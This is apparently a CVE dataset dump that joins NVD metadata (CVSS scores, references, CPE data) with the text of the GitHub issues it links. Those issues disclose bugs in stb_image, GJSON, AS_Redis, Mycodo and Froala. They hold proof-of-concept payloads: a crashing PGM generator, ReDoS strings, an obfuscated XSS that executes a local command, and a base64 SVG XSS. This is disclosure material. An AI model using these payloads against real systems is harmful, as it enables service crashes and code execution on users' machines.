"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1166"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/issues/1225"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/nothings/stb/pull/1223"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3TDGZFLBOP27LZKLH45WQLSNPSPP7S7Z/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AF2CNP4FVC6LDKNOO4WDCGNDYIP3MPK6/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BEGXBDEMTFGINETMJENBZ6SCHVEJQJSY/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CI23LXPEV2GCDQTJSKO6CIILBDTI3R42/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FTZXHFZD36BGE5P6JF252NZZLKMGCY4T/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2M5CRSGPRF7G3YB5CLU4FXW7ANNHAYT/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ID6II3RIKAMVGVMC6ZAQIXXYYDMTVC4N/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TXX76TJMZBPN3NU542MGN6B7C7QHRFGB/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VP2YEXEAJWI76FPM7D7VXHWD3WESQEYC/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nothings:stb_image.h:2.27:*:*:*:*:*:*:*",
"matchCriteriaId": "026BA031-EE47-451B-8A8C-1CE5F0233D27",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/nothings/stb/issues/1225 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"nothings",
"stb"
] | **Summary**
stb_image's PNM loader in version v2.27 incorrectly interpreted 16-bit PGM files as 8-bit when converting to RGBA, leading to buffer overflow when later reinterpreting the result as a 16-bit buffer. An attacker could potentially have crashed a service using stb_image, or read up to 1024 bytes of non-consecutive heap data without control over the read location.
CVE number: [CVE-2021-42716](https://nvd.nist.gov/vuln/detail/CVE-2021-42716)
**Describe the bug**
In stb_image's PNM reader, loading a valid 16-bit PGM file that is large enough
with the number of components set to 4 can cause a crash in
`stbi__convert_16_to_8()` due to an out-of-bounds read.
This issue includes a fix in pull request #1223, and a proof of concept file that
can be used to reproduce the crash. We're reporting this on GitHub Issues
following the guidance in issue #1213.
This appears to be due to how when `stbi__pnm_load()` loads a 16-bit PGM file
with N bytes of data, it incorrectly calls `stbi__convert_format()` instead of
`stbi__convert_format16()`, returning a buffer that is 2N bytes long instead of
4N bytes. Since `ri.bits_per_channel` is still 16 when control returns to
`stbi__load_and_postprocess_8bit()`, `stbi__convert_16_to_8()` attempts to read
`img_len=4N` bytes of data from this buffer, resulting in out-of-bounds reads.
When N is large enough, this results in an access violation.
**To Reproduce**
This .zip contains a 513 KB .pgm file, 16_to_8_oob_poc.pgm, which reproduces this issue:
[16_to_8_oob_poc.zip](https://github.com/nothings/stb/files/7306670/16_to_8_oob_poc.zip)
Calling `stbi_load()` with a path to this file and with a req_comp of 4 produces a
crash. I was able to verify this using tests/image_test.c (modified slightly in
order to build) on Windows version 20H2 with Microsoft Visual Studio 2019, and
I expect it should reproduce on other systems as well.
This file was generated using the following Python script, and should be a valid PGM file:
```
f = open('16_to_8_oob_poc.pgm', 'wb')
f.write(b'P5\n\n512 512\n65535\n')
f.write(bytearray([1]*512*512*2))
f.close()
```
It was derived from an example found using the [Radamsa fuzzer](https://gitlab.com/akihe/radamsa).
Interestingly, tests/pbm/basi0g16.pgm is also a 16-bit PGM file, but reading it
doesn't cause a crash! I believe the reason is because this is a 32 x 32 image,
so it only includes N=2048 bytes of image data, and as a result the out-of-bounds
reads don't cross a page boundary that would result in an access violation.
**Expected behavior**
The example file should be loaded without crashing.
**Screenshots**
Here's a screenshot showing where the crash occurs and the call stack, when run
with the example file in image_test.c. (Note that the call in image_test.c may
be off by 2 lines; the specific callsite is `stbi_load(argv[i], &w, &h, &n, 4)`.)

Thanks! | In stb_image's PNM reader, loading a specially constructed valid 16-bit PGM file with 4 channels can cause a crash due to an out-of-bounds read | https://api.github.com/repos/nothings/stb/issues/1225/comments | 3 | 2021-10-07T20:08:31Z | 2023-01-29T23:48:18Z | https://github.com/nothings/stb/issues/1225 | 1,020,416,230 | 1,225 | 2,712 |
CVE-2021-42836 | 2021-10-22T18:15:14.897 | GJSON before 1.9.3 allows a ReDoS (regular expression denial of service) attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/issues/236"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/issues/237"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/issues/236"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/issues/237"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gjson_project:gjson:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9F0248C7-EA4B-42FB-9DEE-EA81C56D563E",
"versionEndExcluding": "1.9.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/tidwall/gjson/issues/236 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"tidwall",
"gjson"
] | func main() {
testJson := `#[%"*?**?**?**?**?**?***?**?**?**?**?*"""]`
gjson.Get(testJson, testJson)
} | gjson.Get can cause DoS attacks. GJSON <= 1.9.1 allows attackers to cause a redos via crafted JSON input. | https://api.github.com/repos/tidwall/gjson/issues/236/comments | 0 | 2021-10-01T04:53:27Z | 2021-10-04T18:48:58Z | https://github.com/tidwall/gjson/issues/236 | 1,012,886,786 | 236 | 2,713 |
CVE-2021-42836 | 2021-10-22T18:15:14.897 | GJSON before 1.9.3 allows a ReDoS (regular expression denial of service) attack. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96"
},
{
"source": "cve@mitre.org",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/issues/236"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/issues/237"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/590010fdac311cc8990ef5c97448d4fec8f29944"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/commit/77a57fda87dca6d0d7d4627d512a630f89a91c96"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/compare/v1.9.2...v1.9.3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/issues/236"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tidwall/gjson/issues/237"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gjson_project:gjson:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9F0248C7-EA4B-42FB-9DEE-EA81C56D563E",
"versionEndExcluding": "1.9.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"400"
] | 400 | https://github.com/tidwall/gjson/issues/237 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"tidwall",
"gjson"
] | func main() {
testJson := `#[%"*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,,,,,,""*,*"]`
gjson.Get(testJson, testJson)
} | gjson.Get can cause DoS attacks. GJSON <= 1.9.2 allows attackers to cause a redos via crafted JSON input. | https://api.github.com/repos/tidwall/gjson/issues/237/comments | 2 | 2021-10-08T09:28:45Z | 2022-06-09T09:41:39Z | https://github.com/tidwall/gjson/issues/237 | 1,020,889,800 | 237 | 2,714 |
CVE-2021-41172 | 2021-10-26T14:15:08.067 | AS_Redis is an AntSword plugin for Redis. The Redis Manage plugin for AntSword prior to version 0.5 is vulnerable to Self-XSS due to due to insufficient input validation and sanitization via redis server configuration. Self-XSS in the plugin configuration leads to code execution. This issue is patched in version 0.5. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.2,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/AntSword-Store/AS_Redis/issues/1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Medicean/AS_Redis/security/advisories/GHSA-j8j6-f829-w425"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://mp.weixin.qq.com/s/yjuG6DLT_bSRnpggPj21Xw"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/AntSword-Store/AS_Redis/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/Medicean/AS_Redis/security/advisories/GHSA-j8j6-f829-w425"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://mp.weixin.qq.com/s/yjuG6DLT_bSRnpggPj21Xw"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:antsword_redis_project:antsword_redis:*:*:*:*:*:antsword:*:*",
"matchCriteriaId": "BD8189A1-67C4-4BD3-A602-30256D3B5413",
"versionEndExcluding": "0.5",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/AntSword-Store/AS_Redis/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"AntSword-Store",
"AS_Redis"
] | Discoverer: cc7v@校长
### Affected
AS_Redis Plugin version <= v0.4
### Fixed
AS_Redis Plugin version >= v0.5
### PoC
```
<img src=1 onerror=alert(1)>
```

### Exploit
Lead to Local Code Execution
```
<img src=1 onerror="eval(String.fromCharCode(114,101,113,117,105,114,101,40,39,99,104,105,1 08,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,40,39,99,97,108,99, 46,101,120,101,39,41))">
```

### Reference
https://mp.weixin.qq.com/s/yjuG6DLT_bSRnpggPj21Xw
| v0.4 Self-XSS in host addr | https://api.github.com/repos/AntSword-Store/AS_Redis/issues/1/comments | 0 | 2021-10-20T07:33:14Z | 2021-10-20T07:35:22Z | https://github.com/AntSword-Store/AS_Redis/issues/1 | 1,031,076,330 | 1 | 2,715 |
CVE-2021-41185 | 2021-10-26T15:15:10.533 | Mycodo is an environmental monitoring and regulation system. An exploit in versions prior to 8.12.7 allows anyone with access to endpoints to download files outside the intended directory. A patch has been applied and a release made. Users should upgrade to version 8.12.7. As a workaround, users may manually apply the changes from the fix commit. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/kizniche/Mycodo/commit/23ac5dd422029c2b6ae1701a3599b6d41b66a6a9"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kizniche/Mycodo/issues/1105"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/kizniche/Mycodo/releases/tag/v8.12.7"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/kizniche/Mycodo/security/advisories/GHSA-252r-94ph-m229"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/kizniche/Mycodo/commit/23ac5dd422029c2b6ae1701a3599b6d41b66a6a9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kizniche/Mycodo/issues/1105"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/kizniche/Mycodo/releases/tag/v8.12.7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/kizniche/Mycodo/security/advisories/GHSA-252r-94ph-m229"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mycodo_project:mycodo:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C8B4BD3A-4B47-41A4-84D2-B9E703773D53",
"versionEndExcluding": "8.12.7",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/kizniche/Mycodo/issues/1105 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"kizniche",
"Mycodo"
] | What would be the right contact to report a security vulnerabilty? thanks! | Security Vulnerability | https://api.github.com/repos/kizniche/Mycodo/issues/1105/comments | 8 | 2021-10-25T06:38:07Z | 2021-10-27T02:27:36Z | https://github.com/kizniche/Mycodo/issues/1105 | 1,034,737,651 | 1,105 | 2,716 |
CVE-2020-22864 | 2021-10-26T22:15:08.060 | A cross site scripting (XSS) vulnerability in the Insert Video function of Froala WYSIWYG Editor 3.1.0 allows attackers to execute arbitrary web scripts or HTML. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/froala/wysiwyg-editor/issues/3880"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.youtube.com/watch?v=WE3b1iSnWJY"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/froala/wysiwyg-editor/issues/3880"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.youtube.com/watch?v=WE3b1iSnWJY"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:froala:froala_editor:3.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "66771C0F-E1E4-4482-A41E-5DF819031499",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/froala/wysiwyg-editor/issues/3880 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"froala",
"wysiwyg-editor"
] | ##### Steps to reproduce the problem.
1.Go to the Official demo
[https://froala.com/wysiwyg-editor/](url)
2.Click on the [+] button
3.Click on [insert video] button
4.Click on [Embedded Code] button
5.Paste the payload
`<EMBED/SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw ICIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCJUaGVyZSBpcyBhIFhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">`
##### Recording.
[https://www.youtube.com/watch?v=WE3b1iSnWJY](url) | XSS vulnerability in [insert video] | https://api.github.com/repos/froala/wysiwyg-editor/issues/3880/comments | 13 | 2020-04-16T15:51:52Z | 2022-06-29T18:54:36Z | https://github.com/froala/wysiwyg-editor/issues/3880 | 601,191,526 | 3,880 | 2,717 |
CVE-2020-21250 | 2021-10-27T20:15:07.817 | CSZ CMS v1.2.4 was discovered to contain an arbitrary file upload vulnerability in the component /core/MY_Security.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
